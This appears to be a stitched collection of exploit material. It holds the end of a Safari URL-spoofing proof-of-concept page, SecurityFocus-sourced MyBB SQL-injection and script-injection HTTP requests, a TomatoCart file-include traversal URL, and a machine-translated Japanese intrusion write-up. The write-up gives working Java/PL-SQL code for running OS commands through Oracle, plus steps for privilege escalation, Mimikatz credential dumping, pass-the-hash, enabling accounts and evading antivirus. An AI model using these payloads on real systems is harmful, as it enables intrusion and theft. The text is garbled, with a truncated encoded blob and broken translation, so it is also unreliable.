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'/><h1></b>Hello !! i'm a Spoofed Site !!!</b></h1></body>"); } </script> </head> <body onload="invokePoC()"> <h1>Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1> <noscript><p>this testcase requires JavaScript to run.</p></noscript> <p>First Click in this link ==> <a href="http://www.example.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p> <p>and Look in result window, the address bar , show The url and if you write any url in the address bar, the browser can't navigate to it. This issue can be used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and prior versions, also Safari for IOS is Too vulnerable. </body> </html>

source: https://www.securityfocus.com/bid/52743/info MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MyBB 1.6.6 is vulnerable; other versions may also be affected. POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1 Host: 192.168.7.5 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1; adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM; sid=d725ac10b7d8f0f8765dfa73f5dcf23b Content-Type: application/x-www-form-urlencoded Content-Length: 638 my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya &conditions%5Busergroup%5D%5B%5D=2'&conditions%5Bwebsite%5D=&conditions%5Bicq%5D=&conditions%5Baim%5D= &conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D= &conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D= &conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA &profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card

source: https://www.securityfocus.com/bid/52743/info MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MyBB 1.6.6 is vulnerable; other versions may also be affected. POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1 Host: 192.168.7.5 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1; adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM; sid=d725ac10b7d8f0f8765dfa73f5dcf23b Content-Type: application/x-www-form-urlencoded Content-Length: 638 my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya &conditions%5Busergroup%5D%5B%5D=2<script>document.write(Date())</script>&conditions%5Bwebsite%5D=&conditions%5Bicq%5D= &conditions%5Baim%5D=&conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D= &conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D= &conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA &profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card

source: https://www.securityfocus.com/bid/52766/info TomatoCart is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. TomatoCart 1.2.0 Alpha 2 is vulnerable; other versions may also be affected. http://www.example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00

0x00イントラネットの初期探索 情報センターの教師に応募して、学校にイントラネット浸透テストを実施することを許可した後、学校のイントラネットの使用システムに関する情報を収集し始めました。それらのほとんどは、公開されていないフレームワークコンポーネントの新しいバージョンを使用しているため、最初のスチュワードシッププロセスがデッドロックになります。しかし、学校が開いたさまざまなWebシステムを再訪した後、驚くべきシステムを見つけました。 学校は多くの新しいシステムを使用しましたが、古いシステムをオフにしませんでした。検索の後、この古いシステムにファイルをアップロードする脆弱性があることが確認されました。 フィルタリングがなければ、それは単なる掘り出し物であると言えます。 また、トロイの木馬の道も返します。しかし、私は非常に奇妙な現象に遭遇しました。アリの剣と包丁に接続した後、リターンパスは異なり、そのファイルも異なります。 その中で、アリの剣で接続されたシェルはファイルをアップロードすることはできませんが、包丁で接続されたシェルはできます。また、WebShellはコマンドを実行した後にIPをブロックし、WAFがあると疑われます。そこで、最初にMSF ASPX Trojanを渡してメータープレターセッションを取得します。 Windows-Exploit-Suggestを使用して、未収パッチを検出します。 MS16-075の非常に有用な脆弱性があることがわかりました。 MSFのJuicy_potatoモジュールと直接協力して攻撃します。 CLSIDを変更することを忘れないでください。ここで見つけることができます。 https://github.com/ohpe/juicy-potato/tree/master/clsid ペイロード用のbind_tcpのフォワード接続を選択することをお勧めします。そうしないと、シェルをポップアップ表示しない場合があります。 このようにして、システム許可が取得されます。次のステップは、機械から情報を収集し、水平浸透に役立つ情報を取得することです。奇妙なことに、このマシンにはもともとドメインがあったことですが、今では消えていて、ドメイン制御が見つかりません。したがって、私たちの焦点はパスワード衝突ライブラリにあります。 MSFが付属しているMimikatzモジュールを使用して、パスワードを取得します。 私は2つまたは3つのマシンにぶつかりましたが、それらのいくつかはポート445を持っていましたが、ポート3389はありませんでした。 このようにして、MS-17010を使用してみることができますが、使用中の一部のシステムに影響を与える可能性があることを考慮すると、より安全なPSEXECモジュールを使用してライブラリにぶつかることを選択しました。つまり、ハッシュ配信。プレーンテキストで取得できないパスワードが発生したときに、パスワードのハッシュ値をダンプしてから、PSEXECモジュールを使用してハッシュ配信を使用して攻撃を行うことがあります。私たちが得るのは、システム許可だけです。 その後の手順は退屈でした。これは、パスワードを収集するためにライブラリに絶えずぶつかり、収集されたパスワードを介してライブラリにぶつかることでした。十分なマシンとパスワードを取得した後、ボーダールーターが見つかりましたが、以前に収集されたパスワードを正常にログインすることができなかったため、あきらめる必要がありました。このネットワークセグメントは終了します。 0x01詳細な探索 新しいシステムを検索した後、ファイルのダウンロード脆弱性が機能の1つにあることがわかりました。 そして、それはルートユーザーによって開始されたサービスです。理想的な状況は、 /etc /Shadowファイルを読み取り、ルートユーザーのパスワードを爆発させることです。 （失敗）、次に /root/.bash_historyを読んで、ルートユーザーの操作履歴を取得します。 Tomcatの展開とバックアップソースコードファイルへのパスを記録します。ソースコードをダウンロードして情報を収集することにより、非常に重要な情報を収集しました。このネットワークセグメントのほとんどのマシンは、Oracleデータベースを使用しており、SIDを変更していません。まだ試してみるパスワードがいくつかあります。 爆発の後、Oracleデータベースシステムのユーザーパスワードは変更されておらず、マネージャーであることがわかりました。誰もがOracleデータベースがシステムコマンドを実行できることを指定する必要があり、システムユーザーはシステムコマンドを実行する条件を完全に満たしています。退屈な手順を削除し、コマンドを直接実行できるツールをオンラインで見つけました。 0x03火の動作検出をバイパス しかし、別の奇妙な問題が発生しました。いくつかのコマンドしか実行できませんでした。私はシステムユーザーですが、ネットユーザーなどのコマンドを使用すると、エコーはありません。その後、ターフールが異常な行動を傍受したことがわかった。次に、NAVICATのSQLPLUSを使用してサーバーに直接接続しようとしました。オンラインの手順によると、サーバーによって返された1または0に基づいてコマンドが実行されるかどうかを判断できます。 「oscommand」という名前のJavaソースを作成または交換し、コンパイルします -Java: OSコマンド java.io.*をインポートします。 java.lang。*をインポートします。 パブリッククラスオスコマンド{ public static string run（string command）{ Runtime rt=runtime.getRuntime（）; int rc=-1; 試す{ プロセスp=rt.exec（command）; int bufsize=32000; int len=0; バイトバッファー[]=new byte [bufsize]; 文字列s=null; BufferedInputStream bis=new BufferedInputStream（p.getInputStream（）、bufsize）; len=bis.read（buffer、0、bufsize）; rc=p.waitfor（）; if（len！=-1）{ s=new String（Buffer、0、Len）; return（s）; } return（rc+''）; } catch（例外e）{ e.printstacktrace（）; return（ '-1 \ ncommand [' + command + '] \ n' + e.getmessage（））; } } } / エラーを表示します function osexec（ccommand in string）return varchar2を作成または交換する -Function: OS exec -DESCR: PL/SQLラッパーJavaオスコマンド保存Proc - 言語Java name 'oscommand.run（java.lang.string）return java.lang.string'; / エラーを表示します -sysdba。 Osexecを所有する該当するスキーマにスコットを置き換える - およびオスコマンドはProcを保存しました。 宣言する スキーマvarchar2（30）:='scott'; 始める dbms_java.grant_permission（ スキーマ、 'sys:java.io.filepermission'、 「すべてのファイル」、 '実行する' ）; dbms_java.grant_permission（ スキーマ、 'sys:java.lang.runtimepermission'、 「WriteFileDescriptor」、 '*' ）; dbms_java.grant_permission（ スキーマ、 'sys:java.lang.runtimepermission'、 「ReadFileDescriptor」、 '*' ）; 専念; 終わり; / - ローカル接続情報を表示します sql select osexec（ 'ipconfig'）はdualのstdoutとして。 stdout ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------） WindowsIP ? ??? l ? 3: l ? DNS ? 。 。 ? t ? IPv6 ? 。 ************ IPv4 ? 192.168.100.100 ?? 255.255.255.0 ? 0.0.0.0 - ゲストアカウントを活性化します sql select osexec（ 'cmd.exe /c net user guest /active:yes'）stdout from dual; stdout ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------） 0アンチウイルスソフトウェア監視Oracleの動作があるため、攻撃するためにいくつかの途切れない動作を組み合わせる必要があります。 私が予想していなかったのは、ポート3389を開くためにコマンドラインを直接実行したとき、Turfurがそれを傍受しなかったということでした。しかし、ネットユーザーやその他のコマンドを実行すると、実行できません。この時点で、私は突然ゲストユーザーを思い出しました。ゲストユーザーを有効にし、管理者グループに参加しました。今回はブロックされませんでした。リモートデスクトップに直接接続した後、マシンでMimikatzを使用するか、シェルをCSにリバウンドしたい場合に失敗します。 さらに、ユーザーやその他の機密操作を追加するなど、ゲストユーザー向けの一部のアクセス許可が無効になっています。しかし、ネットユーザーを実行していたとき、私はユーザーを見つけました。これは以前のマシンで見たことがあり、このユーザーのパスワードを持っています。したがって、SQLPLUSを使用して、このユーザーを管理者グループに追加します。 